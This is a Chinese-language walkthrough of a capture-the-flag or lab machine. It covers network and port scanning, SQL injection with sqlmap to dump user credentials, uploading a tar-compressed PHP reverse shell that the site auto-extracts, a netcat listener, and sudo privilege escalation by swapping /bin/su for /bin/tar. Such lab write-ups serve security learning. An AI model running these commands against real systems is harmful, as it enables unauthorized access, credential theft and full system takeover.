确认物理地址

00:0C:29:BC:05:DE

ip扫描

arp-scan -l

端口扫描

nmap 192.168.48.167

访问一下80端口

burp抓包

找到一个登录框

想着burp抓包试试

将抓到的包放入kali中的文件中使用sqlmap注入试试

sqlmap

存在sql注入

sqlmap -r password --batch --random-agent 

发现存在sql注入，可使用万能密码登录

利用--dump命令打印出用户信息

sqlmap -r passwd --batch --random-agent --dump

文件上传

登录发现有文件上传功能点，默认万能密码登录是第一个用户，发现不能上传，我们切换第二个用户

来到upload页面，我们上传一个webshell文件

来到用户目录下

/~etenenbaum点击上传的文件发现没有解析

我们想起来了上面勾选的那个自动解压按钮，利用kali自带的webshell并将其压缩

find / -type f -name "php*reverse*"
cp /usr/share/webshells/php/php-reverse-shell.php ./
vim /php-reverseoshell.php   #修改为kali  ip
tar -czf php.tar.gz php-reverse-shell.php

上传

发现自动解压了

反弹shell

kali开启监听（我这里没有修改端口默认的）双击执行php文件反弹得到shell

nc -lvvp 8888

提权

sudo -l 提权

sudo mv /bin/tar /bin/tar.bak
sudo mv /bin/su /bin/tar
sudo tar

提权成功